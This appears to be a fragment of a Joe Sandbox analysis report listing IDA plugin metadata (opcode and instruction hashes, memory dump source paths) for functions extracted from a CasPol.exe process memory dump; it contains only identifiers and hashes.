                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51df1df96eebf7029e7408f40c506e4a58f4a8cde9edf4b95428a88136f2c060
                                                                                                                            • Instruction ID: e2356436bd37c2110d1caee9498be0d114da1ee1f916fe83e5cb3138afc1786f
                                                                                                                            • Opcode Fuzzy Hash: 51df1df96eebf7029e7408f40c506e4a58f4a8cde9edf4b95428a88136f2c060
                                                                                                                            • Instruction Fuzzy Hash: D4F0F0B1E0022A4BCB80ABB984056EF7AF59F84255F100636E45AE7301EB348E068BD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3efd09009c6e79a17971cbff7cbb87fd516794b583542572b8fd3f3f69e73f12
                                                                                                                            • Instruction ID: cd44b81ba1fada4118556672cafc1f13f3ae6ebb8dd430cd425f04a94b8e4fe1
                                                                                                                            • Opcode Fuzzy Hash: 3efd09009c6e79a17971cbff7cbb87fd516794b583542572b8fd3f3f69e73f12
                                                                                                                            • Instruction Fuzzy Hash: 34F08275F001294FCF80ABB9840869F7AF99F89255B000575E409E7300EB348D018BD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a92d5882ddf1fcc1b7987494ffa1dff59705eee442687a0b5367b75e747ee319
                                                                                                                            • Instruction ID: 268f80422227b51dfe404f61430a18928b4a213b98bfae478c7b1552f74715ca
                                                                                                                            • Opcode Fuzzy Hash: a92d5882ddf1fcc1b7987494ffa1dff59705eee442687a0b5367b75e747ee319
                                                                                                                            • Instruction Fuzzy Hash: E2F0A7709553579BCF608F74C4963DE7FF1EF06314F204A99C065D6292D77541468F80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 91a4c734004ed23c50cfe3c301b6623b220ffc4f73a54299f4e78eed21540681
                                                                                                                            • Instruction ID: 2fed173b852cbbc7a72baa5817bfb9f7826a670a5ce2495fe52cf782b3b9546c
                                                                                                                            • Opcode Fuzzy Hash: 91a4c734004ed23c50cfe3c301b6623b220ffc4f73a54299f4e78eed21540681
                                                                                                                            • Instruction Fuzzy Hash: FFE0C03A2053204FCB53A274A5452EBF7A1CF836207008D1BE0A9DBC41C7301E0A4B52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8bda765234b50803089fda1a42ab3f6e296bca5b263b20d69192ada551838c91
                                                                                                                            • Instruction ID: c0ea25cbb0877161cd4b055a820c3f4055eb35568531d94ddce9405431282e0a
                                                                                                                            • Opcode Fuzzy Hash: 8bda765234b50803089fda1a42ab3f6e296bca5b263b20d69192ada551838c91
                                                                                                                            • Instruction Fuzzy Hash: 38E0E570D0531ADFCB90EFB9C4963AEBBF0AB08304F60896AC119E2380E7B446418F81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aa8d47dd98fe390664f55e3ef9b27b153428288b088e564e8431813ac0571bcc
                                                                                                                            • Instruction ID: ddeae2885fc1cff928d2f5f423606553a3983d5b7edbcf0948a0482639288d61
                                                                                                                            • Opcode Fuzzy Hash: aa8d47dd98fe390664f55e3ef9b27b153428288b088e564e8431813ac0571bcc
                                                                                                                            • Instruction Fuzzy Hash: 93D02B352007204BC670B669D48966FB3E5CBC6764B408D3CE56E87A00DB707D058B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 55ad9c9d56d5f189db3dedbbe20729e61257b939bd5bed6d5b94cc8be0c7f40a
                                                                                                                            • Instruction ID: 6b6681f9a556dafec29ae373970a48c1978d59762a9fa7f0b6f591c3765ecabd
                                                                                                                            • Opcode Fuzzy Hash: 55ad9c9d56d5f189db3dedbbe20729e61257b939bd5bed6d5b94cc8be0c7f40a
                                                                                                                            • Instruction Fuzzy Hash: E4D0677BB400189BCB14DF98E894DDDF776FB98221B048116FA15A3260C6729965DB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%